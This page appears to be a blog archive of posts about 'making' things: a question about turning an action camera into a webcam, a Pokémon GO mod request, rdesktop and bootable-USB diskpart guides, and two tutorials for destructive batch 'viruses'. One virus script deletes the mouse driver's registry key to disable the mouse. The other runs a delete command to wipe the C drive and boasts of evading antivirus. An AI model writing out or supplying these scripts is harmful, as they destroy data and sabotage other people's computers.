Showing posts with label make. Show all posts
Showing posts with label make. Show all posts

Tuesday, 20 December 2016

Help me make my actioncam a webcam

Help me make my actioncam a webcam


I have an amba-based actioncam whose name I wont mention because google shouldnt connect it to this page. I found out how to use it as a webcam:
  1. Connect to the camera via wifi of your phone.
  2. Start the phone app
  3. Connect to your camera
  4. Once the image shows, quit the app
  5. Connect with your computers external wifi adapter(router doesnt work so easily) to the camera
  6. Enter rtsp://192.168.42.1/live in splitcam
  7. Use the stream - in skype etc.
I want to skip 1. to 4. which are necessary, because the camera does not immediately send the stream only after the app does something to it. The camera support was of no help, they even said that streaming to the computer was impossible, so I downloaded the apk and disassembled it. I see how the app connects in the source code, but I cannot see, which commands it sends beforehand, which I would have to emulate in software on my computer. Can you have a look at the attached source code and tell me?

You can find the disassembled file at
https COLON SLASH SLASH drive DOT google DOT com SLASH file SLASH d SLASH 0Bx2f1564appiUjhjZWMyYlQyY1E SLASH view?usp=sharing
Virustotal
https COLON SLASH SLASH www DOT virustotal DOT com SLASH de SLASH file SLASH 26d90fbaa208ea34bf12d523cbd8412b0ceafd39c9e1b09a87 ec1f1c649e681c SLASH analysis SLASH 1469390595 SLASH


from xda-developers http://ift.tt/2adNoTl
via IFTTT

Available link for download

Read more »

Tuesday, 13 December 2016

Can someone make a Pokémon GO – Perfect Throw Every Time MOD !

Can someone make a Pokémon GO – Perfect Throw Every Time MOD !


I was wondering if someone could make a xposed module that allows you to get a perfect throw every time! IOS/Cydia has updated the tap to walk so now you have unlimited perfect throws included. And we are the androidmasterace so i we must be alivalibol to make that aswell, if someone could make somthing like that I and many others whould have priciated it!


from xda-developers http://ift.tt/2al11hM
via IFTTT

Available link for download

Read more »

Make A Virus That Disable Mouse

Make A Virus That Disable Mouse



Make A Virus That Disable Mouse
I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.

Available link for download

Read more »

Sunday, 4 December 2016

How to make a remote desktop connection in linux

How to make a remote desktop connection in linux
















Making a remote desktop connection inwindows is really easy, you just need to open up run, type in mstsc , entering the ip of the remote host and click connect.
But how to make a remote desktopconnection in linux?
Firstly you need to install rdesktop. Open up terminal and type the following:
sudo apt-get install rdesktop

Available link for download

Read more »

Friday, 2 December 2016

Learn To Make Dangerous Virus In A Minute

Learn To Make Dangerous Virus In A Minute




computer virus
In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. Nosoftware is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C: *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please dont try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Available link for download

Read more »

Thursday, 18 August 2016

Make bootable USB In CMD

Make bootable USB In CMD


how to make a bootable USB with the help of CMD.You can Make Bootable USB of Windows 7/windows 8 by Command prompt. Follow these simple steps.. 
>Insert your Pen drive and press the start button.
>Type cmd and right click on it and start this with administrator right.
>Now on the command prompt, type the following commands
->Diskpart
List disk
// List disk command will generate the list of Disk connected to your computer like Hard disk and USB disk. This will be like in figure.
After this
->Select disk 1 // in my case USB it is as disk 1
->Clean
->Create partition primary
->Active
->Format fs=ntfs quick // Format File system=NTFS quick(don’t use Quick for deep format, just use format fs=ntfs)
->Assign
->Exit
Now copy all the files of Bootable CD to pendrive.
Just reboot your computer, enter in BIOS setup and select boot device priority as
* USB
* HDD
* CD/DVD
* Network (Other)
And Tap [F10] to save and Exit.
Enjoy.......!!! 


Available link for download

Read more »